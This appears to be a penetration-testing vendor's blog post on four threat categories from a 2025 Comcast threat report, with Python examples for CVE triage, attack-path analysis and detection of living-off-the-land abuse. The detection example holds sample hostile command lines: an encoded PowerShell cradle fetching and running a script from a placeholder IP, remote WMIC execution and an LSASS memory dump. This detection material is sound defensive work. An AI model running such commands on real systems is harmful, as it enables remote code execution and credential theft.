The 2025 Comcast Business Cybersecurity Threat Report analyzed 34.6 billion cybersecurity events across industries, revealing how attackers are shifting tactics and accelerating the pace at which exposures become exploitable. The headline numbers matter, but the pragmatic lesson for security teams is this: adversaries turn small, common conditions into high-impact compromises. To make this practical, we will expand on four of the threats that keep showing up in breach postmortems, how they work in reality, and what organizations should do about them.
Phishing: The initial foothold that scales into enterprise compromise
How attackers use phishing in the wild
Phishing is rarely a single email and a click. Modern campaigns use reconnaissance to craft believable lures, weaponize context like invoices or HR notices, and chain follow-on techniques. Attackers will often begin with low-cost reconnaissance. They map public profiles, look for recent hires, understand typical vendor relationships, and harvest details that make an email believable.
From a single successful click the attacker can: obtain credentials, capture session cookies, weaponize MFA fatigue techniques, trick users into approving OAuth consent, or drop a malware payload that provides remote access. Once inside, attackers probe for high value targets, gather credentials, and move laterally.
Real-world risks
A phish click alone can look benign. The real risk is the chain it enables. Compromised credentials can be replayed across corporate applications. OAuth consent abuse can grant persistent API access. Malware can stage ransomware or data theft. Organizations that treat phishing metrics as the end goal miss the true business impact.
How defenders should think about it
Focus on the post-click story. Ask: what could an attacker do immediately after a successful click in my environment? Which accounts could they access? What privileged operations are exposed? How quickly could they escalate and move laterally?
Rapid CVE exploitation: Vulnerabilities become tools at a faster pace
How exploited vulnerabilities manifest
When a critical vulnerability goes public, attackers and researchers both rush to understand exploitability. Soon after, automated exploit scanners and public proof-of-concept code often appear on the internet. Attackers use simple reconnaissance to identify exposed versions, then run mass scanning to find vulnerable targets. Most frequently, these attacks are opportunistic, not targeted.
Some adversaries focus on stealthy reconnaissance first. Others weaponize quickly, chaining a vulnerable service into a lateral pivot or data exfiltration path. The pace of weaponization has shortened dramatically, which compresses defender response windows.
Real-world risks
A patched vulnerability is only as good as your ability to find and validate whether you were exposed prior to patching. If an attacker discovers an unpatched service in your estate, they can gain initial access, plant persistence, or act as a launch point for ransomware. The window between public disclosure and active exploitation is when many breaches occur.
How defenders should think about it
Treat new vulnerability disclosures as triggers, not as calendar items. Validate exposure quickly. Prioritize assets not only by CVSS score, but by business criticality and exploitability in your environment. Understand which assets, if compromised, would enable escalation.
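To make "disclosures as triggers" concrete, here is an added example (not code from the Comcast report or from Sprocket) of the triage step a team can run the moment an advisory lands: match the advisory against an asset inventory, then rank the exposed assets by CVSS multiplied by context rather than by CVSS alone. The inventory, the product name, the advisory (a placeholder identifier, not a real CVE) and the weighting factors are all constructed for illustration.

```python
"""Disclosure-driven exposure triage (added example, constructed data).

Turns "a critical CVE was just published" into a ranked work list:
which assets run an affected version, and which of those matter most.
The inventory, the advisory and the weighting factors below are
illustrative assumptions, not real products or real scores.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    host: str
    product: str
    version: tuple          # parsed with parse_version()
    internet_facing: bool
    criticality: int        # 1 (low) .. 5 (crown jewel), assigned by the business


@dataclass(frozen=True)
class Advisory:
    cve: str                # placeholder identifier, not a real CVE
    product: str
    fixed_in: tuple         # first version that is NOT vulnerable
    cvss: float
    public_exploit: bool    # PoC published or mass scanning observed


def parse_version(text):
    """'2.4.0' -> (2, 4, 0); tuples compare component-wise."""
    return tuple(int(part) for part in text.split("."))


def is_exposed(asset, advisory):
    """Exposed = same product and a version below the fixed release."""
    return asset.product == advisory.product and asset.version < advisory.fixed_in


def risk_score(asset, advisory):
    """CVSS is the baseline; context multiplies it.

    Weights are assumptions: exploit in the wild x1.5, reachable from the
    internet x1.5, criticality scaled so that an average asset (3) leaves
    the CVSS score unchanged.
    """
    score = advisory.cvss
    if advisory.public_exploit:
        score *= 1.5
    if asset.internet_facing:
        score *= 1.5
    score *= asset.criticality / 3
    return round(score, 1)


def triage(inventory, advisory):
    """Exposed assets, highest contextual risk first."""
    exposed = [a for a in inventory if is_exposed(a, advisory)]
    return sorted(exposed, key=lambda a: risk_score(a, advisory), reverse=True)


# Constructed inventory: fictional hosts and a fictional product.
INVENTORY = [
    Asset("web-01", "exampleapp", parse_version("2.4.0"), True, 4),
    Asset("batch-07", "exampleapp", parse_version("2.4.0"), False, 2),
    Asset("web-02", "exampleapp", parse_version("2.5.1"), True, 4),   # already on a fixed version
    Asset("db-01", "otherdb", parse_version("1.0.0"), False, 5),      # different product
]

# Constructed advisory; "CVE-EXAMPLE" is a placeholder, not a real identifier.
ADVISORY = Advisory("CVE-EXAMPLE", "exampleapp", parse_version("2.5.0"), 9.8, True)


if __name__ == "__main__":
    for asset in triage(INVENTORY, ADVISORY):
        print(f"{asset.host:10} v{'.'.join(map(str, asset.version))}  "
              f"internet={asset.internet_facing!s:5} crit={asset.criticality}  "
              f"risk={risk_score(asset, ADVISORY)}")
```

Two assets share the same vulnerable version, but the internet-facing, business-critical one ranks three times higher than the internal batch host. What this script cannot tell you is whether the vulnerable code path is actually reachable on each host (authentication required, feature disabled, a WAF in front); that is the piece manual verification adds before the ticket is marked urgent.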
Credential theft and lateral movement: The pathways from compromise to enterprise impact
How credential theft is weaponized
Credential theft can happen in many ways. Attackers buy credentials on underground markets. They harvest passwords via phishing or malware. They exploit password reuse or misconfigured services to pivot. Once they have an account, attackers escalate by identifying privileged accounts, replaying the stolen password against other services, or exploiting single sign-on and trust relationships.
Lateral movement frequently follows a consistent pattern. The attacker enumerates neighboring systems, looks for stored credentials or misconfigurations, and leverages administrative interfaces and remote management tools to broaden access. Inadequate segmentation and implicit trust often make this straightforward.
Real-world risks
Credential theft is a force multiplier. With valid credentials, attackers bypass many preventive controls. They can access sensitive data, disable logging, and execute high impact actions that lead to theft, extortion, or system disruption. Incident response becomes more complex because the activity often looks like legitimate user behavior.
How defenders should think about it
Assume credentials will be compromised and design security architectures for containment. Harden authentication, limit privilege, and ensure robust monitoring and detection on privileged operations. Most importantly, validate whether privilege escalation and lateral movement are possible in practice, not just in policy documents.
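The post-click question from the phishing section ("which accounts, which privileged operations") and the escalation check above are the same computation: a search over the relationships an attacker can abuse, from a phished user to a high-value target. The block below is an added example of that search, not code from the article or from Sprocket. The graph is fictional and constructed for this example; the edge names follow the BloodHound convention (MemberOf, AdminTo, HasSession) so the output reads like the attack paths that tool produces.

```python
"""Attack-path enumeration over an identity graph (added example, constructed data).

Each edge is a relationship an attacker can abuse:
  MemberOf   - the principal inherits the group's rights
  AdminTo    - local administrator on the host (can dump credentials there)
  HasSession - the host holds a logged-on session for that user
A path from a phished user to "Domain Admins" is a validated escalation route.
The graph below is fictional; the edge types follow the BloodHound convention.
"""
from collections import deque

# Constructed graph: (source, relationship, target)
EDGES = [
    ("alice", "MemberOf", "Helpdesk"),
    ("Helpdesk", "AdminTo", "WS-01"),
    ("WS-01", "HasSession", "bob"),           # bob's credentials can be dumped on WS-01
    ("bob", "MemberOf", "ServerAdmins"),
    ("ServerAdmins", "AdminTo", "SRV-01"),
    ("SRV-01", "HasSession", "dadmin"),       # a domain admin logged on to a member server
    ("dadmin", "MemberOf", "Domain Admins"),
    ("carol", "MemberOf", "Finance"),
    ("Finance", "AdminTo", "FS-01"),
]


def adjacency(edges):
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def find_path(edges, start, target):
    """Shortest chain of abusable relationships from start to target, or None."""
    adj = adjacency(edges)
    parents = {start: None}            # node -> (previous node, relationship)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parents[node] is not None:
                prev, rel = parents[node]
                path.append((prev, rel, node))
                node = prev
            return path[::-1]
        for rel, nxt in adj.get(node, []):
            if nxt not in parents:
                parents[nxt] = (node, rel)
                queue.append(nxt)
    return None


def without(edges, *removed):
    """The same graph with specific relationships removed (a candidate fix)."""
    return [e for e in edges if e not in removed]


def blast_radius(edges, start):
    """Everything reachable from a compromised principal."""
    adj = adjacency(edges)
    seen, queue = {start}, deque([start])
    while queue:
        for _, nxt in adj.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen - {start}


if __name__ == "__main__":
    for user in ("alice", "carol"):
        path = find_path(EDGES, user, "Domain Admins")
        print(user, "->", " -> ".join(f"[{r}] {d}" for _, r, d in path) if path else "no path")
    # Tiering fix: keep server-admin sessions off helpdesk-managed workstations.
    fixed = without(EDGES, ("WS-01", "HasSession", "bob"))
    print("after fix:", find_path(fixed, "alice", "Domain Admins"))
```

Note what the result says about policy versus practice: nothing in the graph grants alice administrative rights on paper, yet seven hops of ordinary relationships take her account to Domain Admins. Removing a single edge (no server-admin session on a helpdesk-managed workstation) breaks the path, which is the kind of finding a remediation ticket can act on.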
Playing Out the Endgame: LotL, data exfiltration, and ransomware
How attackers execute endgame objectives
Initial access and lateral movement are only the first phases. Once embedded, adversaries pursue endgame actions: exfiltrating sensitive data, staging ransomware or extortion, and in some cases deploying destructive payloads that disrupt operations. Increasingly, attackers use living off the land (LotL) techniques, abusing legitimate tools such as PowerShell, WMI, or native admin interfaces, to avoid detection and reduce their need for custom malware.
Real-world risks
LotL makes endgame attacks stealthier and harder to catch. Security tools tuned for “malware” may miss native commands being abused for reconnaissance, credential dumping, or data staging. By the time ransomware is launched or data is exfiltrated, the adversary may have been operating quietly for weeks using nothing more than what already exists in the environment. The business impact is severe: stolen data, regulatory fines, brand damage, or outright downtime from ransomware or destructive payloads.
How defenders should think about it
Organizations should not only test for whether ransomware can execute, but also how well their teams can detect and respond to legitimate tools being used for illegitimate purposes. Threat modeling should include scenarios where LotL techniques form the bridge between initial access and business impact. Response plans should assume attackers will avoid “noisy” malware in favor of stealthy, built-in capabilities.
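Detecting "legitimate tools used for illegitimate purposes" means looking at how a built-in binary was invoked, not just which binary ran. The following is an added example (not from the article or from Sprocket) of a few such heuristics run over constructed process-creation events of the kind a Sysmon Event ID 1 or Windows 4688 record carries. The field names are an assumption rather than any vendor's schema, and the hosts, command lines and the 198.51.100.7 address (a documentation range) are invented.

```python
"""Living-off-the-land heuristics over process-creation events (added example).

Input records mimic the fields of a Sysmon event 1 / Windows 4688 entry
(parent image, image, command line); the field names and every event below
are constructed for this example, not a vendor schema or real telemetry.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"DownloadString|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def office_spawns_shell(ev):
    return ev["parent"].lower() in OFFICE_APPS and ev["image"].lower() in SCRIPT_HOSTS


def encoded_powershell(ev):
    return ev["image"].lower() in {"powershell.exe", "pwsh.exe"} and ENCODED_RE.search(ev["cmdline"]) is not None


def download_cradle(ev):
    # Inspect the decoded script when there is one, otherwise the raw command line.
    script = decode_encoded_command(ev["cmdline"]) or ev["cmdline"]
    return CRADLE_RE.search(script) is not None


def wmic_process_create(ev):
    # "process call create" spawns a process; with /node: it runs on a remote host.
    return ev["image"].lower() == "wmic.exe" and re.search(r"process\s+call\s+create", ev["cmdline"], re.I) is not None


def lsass_dump_comsvcs(ev):
    # rundll32 comsvcs.dll MiniDump <pid> writes a process memory dump; aimed at LSASS it is credential theft.
    return ev["image"].lower() == "rundll32.exe" and re.search(r"comsvcs\.dll.*minidump", ev["cmdline"], re.I) is not None


RULES = [office_spawns_shell, encoded_powershell, download_cradle, wmic_process_create, lsass_dump_comsvcs]


def analyze(events):
    """Map event id -> names of the rules it triggers (events with no hits are omitted)."""
    findings = {}
    for ev in events:
        hits = [rule.__name__ for rule in RULES if rule(ev)]
        if hits:
            findings[ev["id"]] = hits
    return findings


# Constructed sample: the cradle points at a TEST-NET-2 address, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"id": 2, "host": "WS-01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"id": 3, "host": "WS-01", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic /node:SRV-01 process call create "cmd.exe /c whoami"'},
    {"id": 4, "host": "SRV-01", "parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"},
    {"id": 5, "host": "SRV-01", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, hits in analyze(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

Every flagged binary is signed by Microsoft and present on every Windows host, so a control that keys on file reputation sees nothing. The benign PowerShell invocation in event 1 passes untouched; the Word-spawned, encoded download cradle in event 2 trips three rules at once, which is the kind of stacking a detection engineer should weight higher than any single hit. The same pattern (decode, then inspect) matters for tuning: the cradle rule only fires on event 2 because the heuristics look inside the encoded command rather than at its base64 surface.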
Practical steps for security teams right now
- Treat disclosures and new threat reports as operational triggers. Automate discovery and schedule validation immediately.
- Move beyond click rates. Validate the downstream business impact of a successful social engineering attack.
- Prioritize exploitable exposures by combining technical severity with business context.
- Assume credentials will fail. Enforce least privilege and test escalation paths.
- Use integrated tooling. Feed scanner outputs and ASM data into a validation pipeline that includes human-led testing.
- Prepare for the endgame. Threat model likely adversary paths to data theft, ransomware, or disruption and validate that protection, detection, and response controls hold up under pressure.
How Continuous Penetration Testing Helps
“The sheer volume of CVEs, the complexity of enterprise IT environments, and downtime considerations can all slow mitigation. This is why a risk-based approach to vulnerability management, coupled with continuous testing, is crucial.” – 2025 Comcast Business Cybersecurity Threat Report
Continuous Phishing
Sprocket tests phishing as an operational problem. We simulate realistic campaigns, capture which accounts are impacted, then validate the downstream exposure by attempting escalation and lateral movement from the foothold. The result is a prioritized set of validated findings that show not just that users clicked, but how the business can be harmed after the click.
Bleeding-Edge Vulnerability Testing
Sprocket’s exposure-driven approach triggers targeted validation when new CVEs are disclosed. We combine automated discovery with manual verification to eliminate false positives and confirm true risk. That allows teams to focus remediation on exploitable exposures, reducing time-to-fix and shrinking the window of opportunity for attackers.
Assumed Breach Testing
Sprocket actively validates escalation paths and lateral movement techniques in your environment. Our testers attempt credential reuse and privilege escalation in controlled conditions, producing validated findings with clear remediation guidance. This validation proves whether controls are effective under real attack conditions and reduces the time attackers can operate undetected.
Threat Modeling & Red Team Events
Sprocket’s Red Team Events and threat modeling exercises emulate advanced adversaries who rely heavily on living off the land techniques to move toward exfiltration, ransomware, and destructive outcomes. By validating how native tools can be misused in each environment, we help organizations understand where their defenses are blind and whether protection, detection, and response controls can withstand realistic endgame scenarios.
Closing: From exposure awareness to verified assurance
The Comcast report provides a useful snapshot of volume and trend. The bigger takeaway is an operational one. When threats change quickly, security programs must change faster. Continuous penetration testing is a practice that gives organizations the evidence they need to act, to prioritize, and to demonstrate measurable reduction in exposure.
For organizations, the next step is translating these industry-wide trends into their own context. Start by reviewing your current testing cadence, understanding how quickly exposures are validated, and identifying where blind spots may exist. Continuous validation is not just a best practice; it is becoming a necessity to keep pace with the speed of modern threats.
Read the Comcast report here: https://business.comcast.com/enterprise/resources/reports/2025-comcast-business-cybersecurity-threat-report